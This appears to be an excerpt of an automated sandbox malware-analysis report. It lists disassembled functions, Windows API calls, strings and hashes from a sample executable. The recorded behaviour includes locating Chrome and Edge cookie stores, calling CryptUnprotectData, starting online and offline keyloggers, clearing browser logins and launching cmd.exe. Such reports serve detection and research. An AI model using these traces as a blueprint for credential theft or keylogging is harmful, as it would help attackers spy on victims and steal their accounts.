                                                                                          • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 00444106
                                                                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                          • _free.LIBCMT ref: 00444118
                                                                                          • _free.LIBCMT ref: 0044412B
                                                                                          • _free.LIBCMT ref: 0044413C
                                                                                          • _free.LIBCMT ref: 0044414D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                          • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                                                          • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                          • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                                                          APIs
                                                                                          • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Enum$InfoQueryValue
                                                                                          • String ID: [regsplt]
                                                                                          • API String ID: 3554306468-4262303796
                                                                                          • Opcode ID: 9697bb9c8a57706a51b28894dccdef54b3feb513602de5161671525287b676f0
                                                                                          • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                                                          • Opcode Fuzzy Hash: 9697bb9c8a57706a51b28894dccdef54b3feb513602de5161671525287b676f0
                                                                                          • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                                                          APIs
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe,00000104), ref: 00443515
                                                                                          • _free.LIBCMT ref: 004435E0
                                                                                          • _free.LIBCMT ref: 004435EA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$FileModuleName
                                                                                          • String ID: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe
                                                                                          • API String ID: 2506810119-2157930343
                                                                                          • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                          • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                                                          • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                          • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                                                          APIs
                                                                                            • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                                                          • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                                                                          Strings
                                                                                          • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                                                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExistsFilePath
                                                                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                          • API String ID: 1174141254-1980882731
                                                                                          • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                          • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                                                          • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                          • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                                                          APIs
                                                                                            • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                                                          • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                                                                          Strings
                                                                                          • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                                                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExistsFilePath
                                                                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                          • API String ID: 1174141254-1980882731
                                                                                          • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                          • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                                                          • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                          • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                                                          APIs
                                                                                          • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                                                          • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040A249
                                                                                          • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040A255
                                                                                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                                                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateThread$LocalTimewsprintf
                                                                                          • String ID: Offline Keylogger Started
                                                                                          • API String ID: 465354869-4114347211
                                                                                          • Opcode ID: 64dafc61654423eae3a0fbe5438306b162becb50c4c83e3e1bc02331eec3325d
                                                                                          • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                                                          • Opcode Fuzzy Hash: 64dafc61654423eae3a0fbe5438306b162becb50c4c83e3e1bc02331eec3325d
                                                                                          • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                                                          APIs
                                                                                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                                                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                                                          • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateThread$LocalTime$wsprintf
                                                                                          • String ID: Online Keylogger Started
                                                                                          • API String ID: 112202259-1258561607
                                                                                          • Opcode ID: 96596c8b347fbc26a7a26b2b5d6211d38eccf114500c3d7a40bfe83d515ab29d
                                                                                          • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                                                          • Opcode Fuzzy Hash: 96596c8b347fbc26a7a26b2b5d6211d38eccf114500c3d7a40bfe83d515ab29d
                                                                                          • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: CryptUnprotectData$crypt32
                                                                                          • API String ID: 2574300362-2380590389
                                                                                          • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                          • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                                                          • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                          • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                                                          APIs
                                                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                                          • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                                          • SetEvent.KERNEL32(?), ref: 004051D9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseEventHandleObjectSingleWait
                                                                                          • String ID: Connection Timeout
                                                                                          • API String ID: 2055531096-499159329
                                                                                          • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                                          • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                                                          • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                                          • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw
                                                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                          • API String ID: 2005118841-1866435925
                                                                                          • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                          • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                                                          • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                          • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                                                          APIs
                                                                                          • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041385A
                                                                                          • RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F85E,pth_unenc,004752D8), ref: 00413888
                                                                                          • RegCloseKey.ADVAPI32(004752D8,?,0040F85E,pth_unenc,004752D8), ref: 00413893
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCreateValue
                                                                                          • String ID: pth_unenc
                                                                                          • API String ID: 1818849710-4028850238
                                                                                          • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                          • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                                                          • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                          • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                                                          APIs
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                                                            • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                                                            • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                          • String ID: bad locale name
                                                                                          • API String ID: 3628047217-1405518554
                                                                                          • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                          • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                                                          • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                          • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                                                          APIs
                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                                                          • ShowWindow.USER32(00000009), ref: 00416C9C
                                                                                          • SetForegroundWindow.USER32 ref: 00416CA8
                                                                                            • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                                                            • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                                            • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                            • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                                                          • String ID: !D@
                                                                                          • API String ID: 186401046-604454484
                                                                                          • Opcode ID: c95d4037f996435fc130d7113ec89fe5e4aa0dd425f9b60b55efc54c96c60bf0
                                                                                          • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                                                          • Opcode Fuzzy Hash: c95d4037f996435fc130d7113ec89fe5e4aa0dd425f9b60b55efc54c96c60bf0
                                                                                          • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                                                          APIs
                                                                                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExecuteShell
                                                                                          • String ID: /C $cmd.exe$open
                                                                                          • API String ID: 587946157-3896048727
                                                                                          • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                          • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                                                          • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                          • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                                                          APIs
                                                                                          • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                          • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                                          • TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: TerminateThread$HookUnhookWindows
                                                                                          • String ID: pth_unenc
                                                                                          • API String ID: 3123878439-4028850238
                                                                                          • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                          • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                                                          • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                          • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc
                                                                                          • String ID: GetCursorInfo$User32.dll
                                                                                          • API String ID: 1646373207-2714051624
                                                                                          • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                          • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                                                          • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                          • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: GetLastInputInfo$User32.dll
                                                                                          • API String ID: 2574300362-1519888992
APIs
Yara matches
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
APIs
Strings
• Cleared browsers logins and cookies., xrefs: 0040C130
• [Cleared browsers logins and cookies.], xrefs: 0040C11F
Yara matches
Similarity
• API ID: Sleep
• String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
• API String ID: 3472027048-1236744412
APIs
• EnumDisplayMonitors.USER32(00000000,00000000,0041960A,00000000), ref: 00419530
• EnumDisplayDevicesW.USER32(?), ref: 00419560
• EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004195D5
• EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195F2
Yara matches
Similarity
• API ID: DisplayEnum$Devices$Monitors
• String ID:
• API String ID: 1432082543-0
APIs
  • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
  • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
  • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
• Sleep.KERNEL32(000001F4), ref: 0040A5AE
• Sleep.KERNEL32(00000064), ref: 0040A638
Strings
Yara matches
Similarity
• API ID: Window$SleepText$ForegroundLength
• String ID: [ $ ]
• API String ID: 3309952895-93608704
APIs
Yara matches
Similarity
• API ID: SystemTimes$Sleep__aulldiv
• String ID:
• API String ID: 188215759-0
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
• Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
• CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
Yara matches
Similarity
• API ID: File$CloseCreateHandleSizeSleep
• String ID:
• API String ID: 1958988193-0
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
• GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
Yara matches
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
• GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C568
• CloseHandle.KERNEL32(00000000), ref: 0041C576
Yara matches
Similarity
• API ID: File$CloseCreateHandleReadSize
• String ID:
• API String ID: 3919263394-0
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
  • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
• _UnwindNestedFrames.LIBCMT ref: 00439911
• ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
• CallCatchBlock.LIBVCRUNTIME ref: 00439947
Yara matches
Similarity
• API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
• String ID:
• API String ID: 2633735394-0
APIs
• GetSystemMetrics.USER32(0000004C), ref: 0041942B
• GetSystemMetrics.USER32(0000004D), ref: 00419431
• GetSystemMetrics.USER32(0000004E), ref: 00419437
• GetSystemMetrics.USER32(0000004F), ref: 0041943D
Yara matches
Similarity
• API ID: MetricsSystem
• String ID:
• API String ID: 4116985748-0
                                                                                          • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                          • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                                                          • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                          • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                                                          APIs
                                                                                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                                                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
